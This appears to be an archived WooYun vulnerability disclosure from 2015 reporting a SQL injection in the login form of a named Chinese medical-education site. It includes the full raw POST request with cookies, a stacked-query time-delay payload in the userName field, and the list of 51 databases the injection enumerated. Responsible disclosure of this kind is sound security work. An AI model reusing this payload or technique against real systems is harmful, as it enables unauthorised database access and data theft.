乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-09-23: 细节已通知厂商并且等待厂商处理中 2015-09-25: 厂商已经确认,细节仅向厂商公开 2015-10-05: 细节向核心白帽子及相关领域专家公开 2015-10-15: 细节向普通白帽子公开 2015-10-25: 细节向实习白帽子公开 2015-11-09: 细节向公众公开
RT
POST 注入
POST /zgpxServ/ManagerLoginServ.aspx HTTP/1.1Host: xljy.91huayi.comUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0Accept: application/xml, text/xml, */*Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestReferer: http://xljy.91huayi.com/xljylogin.aspxContent-Length: 55Cookie: Hm_lvt_b8b19370771d6914b2aac73158a962b8=1442649992,1442650298,1442650317,1442650394; Hm_lvt_ff0968fe442c4e89bf0c5108743a5f31=1442576643,1442641378,1442649306,1442649992; lzstat_uv=35798770783457191819|3596064; looyu_id=44824ed193e7b634c36641aba789a878db_30173%3A10; __BAIDU_STATE_END__=yes; Hm_lpvt_b8b19370771d6914b2aac73158a962b8=1442650414; Hm_lpvt_ff0968fe442c4e89bf0c5108743a5f31=1442649992; _pk_ref.5.6297=%5B%22%22%2C%22%22%2C1442650393%2C%22http%3A%2F%2Fwww.baidu.com%2Flink%3Furl%3DWWxpCypblj7FEME-INR-3ZuOqXcVd6vV6Qox_tbbGA6OQqkTWqBrExSBdNEG_Y-1%26wd%3D%26eqid%3Df38d08200007a1680000000455fd18b1%22%5D; _pk_id.5.6297=4fe84f79b004e82c.1442650393.1.1442650414.1442650393.; _pk_ses.5.6297=*; Hm_lvt_a1e85543998fbc52d336dec9e40cacbd=1442650394; Hm_lpvt_a1e85543998fbc52d336dec9e40cacbd=1442650414Connection: closePragma: no-cacheCache-Control: no-cacheuserName=laoyang&passWord=123456&provinceID=50&lgType=1
userName 存在注入
---Parameter: userName (POST) Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries (comment) Payload: userName=laoyang';WAITFOR DELAY '0:0:5'--&passWord=123456&provinceID=50&lgType=1---
available databases [51]:[*] [HuaYiWeiXin][*] [HY_HE ][*] [HY_zgpx_sichuan][*] [XLJ__XiangYi_ChongQing ][*] [XLJY_HeiLongJian}][*] [??っ???2][*] aspnetdb[*] CeShiDingYueHao[*] CeShiFuWuHao[*] distribution[*] DS_HY_Common[*] Educational_System[*] hy_com_sichuan[*] HY_Record[*] HY_SQPX[*] HY_ZhuapGang[*] hy_?om_guangxi[*] hys_itemauditing[*] hysns1[*] KeJiao_V2[*] KeMiao_V2_Ykyzl[*] master[*] MBOX_StudyRecor??[*] model[*] msdb[*] prjapply_gdzy[*] prjapply_gdzy_20A40522[*] project_apply[*] ReportServer[*] ReportServerTempDB[*] SmartExam2011[*] STBPublicEB[*] tempdb[*] WeiXinFuWuHao[*] WY_zgpx_HuNan[*] XiangYiMis_GuangXi[*] XLJi_G氄angDong[*] XLJY[*] XLJY_FuJian[*] XLJY_GuizhouA[*] xljy_hainan[*] XLJY_Hebei[*] XLJY_HuNan[*] XLJY_NeiMengGu[*] XLJY_SiChuan[*] XLJY_XiangYi_GanYu[*] XLJY_XiZang[*] xljy_yunnan[*] zgpx_sdzb_new[*] ZGPX_XiangYi_GuiZhou[*] zgpx_xiangyi_hunan
5发求礼物
危害等级:高
漏洞Rank:20
确认时间:2015-09-25 11:03
感谢提交!谢谢关注华医网!
暂无